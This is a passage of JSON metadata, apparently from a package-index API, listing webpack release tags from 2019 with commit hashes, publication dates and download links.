b.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"h